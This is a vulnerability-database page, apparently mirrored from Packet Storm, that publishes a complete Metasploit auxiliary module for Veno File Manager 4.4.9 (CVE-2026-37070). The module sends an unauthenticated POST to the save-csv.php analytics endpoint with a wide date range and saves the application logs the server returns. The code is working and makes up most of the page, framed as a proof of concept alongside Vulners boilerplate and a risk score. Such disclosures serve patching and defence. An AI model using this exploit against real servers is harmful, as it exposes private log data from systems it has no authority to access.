Lucene search
K

📄 Veno File Manager 4.4.9 Log Disclosure

🗓️ 19 Jun 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 32 Views

Unauthenticated attackers can download Veno File Manager 4.4.9 logs via the save-csv.php endpoint.

Code
==================================================================================================================================
    | # Title     : Veno File Manager 4.4.9 Unauthenticated Logs Download                                                            |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://veno.es/updates/logs/?slug=vfm/                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : This module allows unauthenticated attackers to download application logs from Veno File Manager 4.4.9 by exploiting the save-csv.php endpoint.
    
    [+] POc        :  
    
    ##
    # Module for Unauthenticated Logs Download
    ##
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Veno File Manager 4.4.9 - Unauthenticated Logs Download',
            'Description' => %q{
              This module allows unauthenticated attackers to download application logs
              from Veno File Manager 4.4.9 by exploiting the save-csv.php endpoint.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-37070'],
              ['URL', 'https://github.com/jfs-jfs/CVE-2026-37070']
            ]
          )
        )
    
        register_options([
          OptString.new('TARGETURI', [true, 'Base path', '/']),
          OptString.new('START_DATE', [true, 'Start date (YYYY-MM-DD)', '2024-01-01'])
        ])
      end
    
      def run
        print_status("Downloading logs from #{datastore['START_DATE']}")
        target_url = normalize_uri(target_uri.path, 'vfm-admin', 'admin-panel', 'view', 'analytics', 'save-csv.php')
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => target_url,
          'vars_post' => {
            'logsince' => datastore['START_DATE'],
            'loguntil' => '3000-12-31'
          }
        })
        if res && res.code == 200 && !res.body.empty?
          print_good("Logs downloaded successfully!")
          print_line(res.body)
          store_loot(
            'vfm.logs',
            'text/csv',
            rhost,
            res.body,
            "vfm_logs_#{datastore['START_DATE']}.csv",
            "VFM Logs from #{datastore['START_DATE']}"
          )
        else
          print_error("Failed to download logs")
        end
      end
    end
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jun 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
32